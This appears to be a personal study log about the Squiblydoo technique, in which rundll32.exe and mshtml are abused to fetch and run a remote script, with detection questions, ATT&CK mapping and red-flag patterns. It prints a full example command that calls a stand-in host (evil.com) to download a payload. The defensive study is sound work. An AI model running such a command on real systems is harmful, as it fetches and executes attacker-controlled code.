🎯 Goal

Today I explored one of the most famous LOLBins (Living Off The Land Binaries) techniques used in Windows attacks: Squiblydoo.

The goal was to understand:

  • how attackers abuse legitimate Windows binaries
  • why this technique became widely used
  • how defenders detect it in logs and telemetry.

πŸ›  What I Did

I studied how attackers can abuse the Windows utility rundll32.exe together with the mshtml Internet Explorer engine to execute remote scripts.

An example command often referenced in security research looks like:

rundll32.exe javascript:”..\mshtml,RunHTMLApplication”;document.write();GetObject(β€œscript:https://evil.com/payload.sct”)

Even though the syntax looks strange, the attack chain works as follows:

rundll32.exe
↓
loads the mshtml engine
↓
downloads a remote script
↓
executes attacker-controlled code

Because the execution is performed through legitimate Windows components, this technique can bypass certain application restrictions.


πŸ”— Key Cybersecurity Connections

This technique became well known because it has been used by:

  • Metasploit
  • PowerShell Empire
  • multiple advanced threat groups

Security researchers refer to this technique as Squiblydoo.

The key idea is that attackers do not need to drop a malicious executable.

Instead they can abuse existing Windows components to execute their payload.


πŸ” Investigation Questions

If this behavior appeared in endpoint telemetry, a SOC analyst might ask:

  • What process launched rundll32.exe?
  • What command-line arguments were used?
  • Was the javascript: protocol invoked through mshtml?
  • Did the system make outbound network connections immediately after execution?
  • Are other endpoints executing similar rundll32 commands?
  • Did the execution spawn additional suspicious child processes?

These questions help analysts determine whether the activity represents legitimate behavior or a LOLBin abuse technique.


🚨 Detection Opportunities

Possible detection strategies include:

  • alerting on suspicious rundll32.exe command-line arguments
  • detecting command lines containing javascript: or RunHTMLApplication
  • monitoring for GetObject("script:...") execution patterns
  • identifying unusual parent β†’ child process relationships
  • correlating process execution with outbound network activity

Telemetry sources useful for this type of detection include:

  • Sysmon process creation events
  • EDR process monitoring
  • command-line auditing logs.

🧭 MITRE ATT&CK Techniques

This technique aligns with several MITRE ATT&CK entries:

  • T1218 – Signed Binary Proxy Execution
  • T1059 – Command and Scripting Interpreter
  • T1105 – Ingress Tool Transfer

Mapping activity to ATT&CK techniques helps defenders categorize attacker behavior and build detection rules.


⚠ Why This Technique Is Dangerous

Traditional defenses often focus on detecting malware files.

But Squiblydoo demonstrates a different approach:

Legitimate binary
↓
loads legitimate Windows component
↓
downloads malicious script
↓
payload executes

No obvious malware file is required.


πŸ“š What I Learned

When defenders investigate suspicious command execution, they often look for unusual command-line arguments.

Possible red flags include command lines containing:

  • javascript:
  • mshtml
  • RunHTMLApplication
  • GetObject("script:...")

Security analysts often detect these behaviors using:

  • EDR telemetry
  • command-line logging
  • Sysmon process creation logs.

➑ Next Steps

Next topics to explore include:

  • how Windows loads DLL files
  • how malware hides inside DLLs
  • how defenders verify file authenticity.

🧠 Reflection

Studying this technique made it clear that attackers often prefer stealth and reliability over complex exploits.

Abusing trusted system components can be more effective than deploying obvious malware.


🧩 Lessons Learned

What worked

Breaking down the command step by step made the attack chain easier to understand.

What broke

The command syntax initially looked confusing and almost unreadable.

Why it broke

Many LOLBin techniques rely on obscure Windows functionality.

Fix / takeaway

Focus on understanding execution flow, not only syntax.


πŸ“ˆ Skill Progression Context

Understanding LOLBins strengthens defensive analysis skills.

It helps when learning:

  • process execution analysis
  • command-line telemetry investigation
  • detection engineering for suspicious process chains.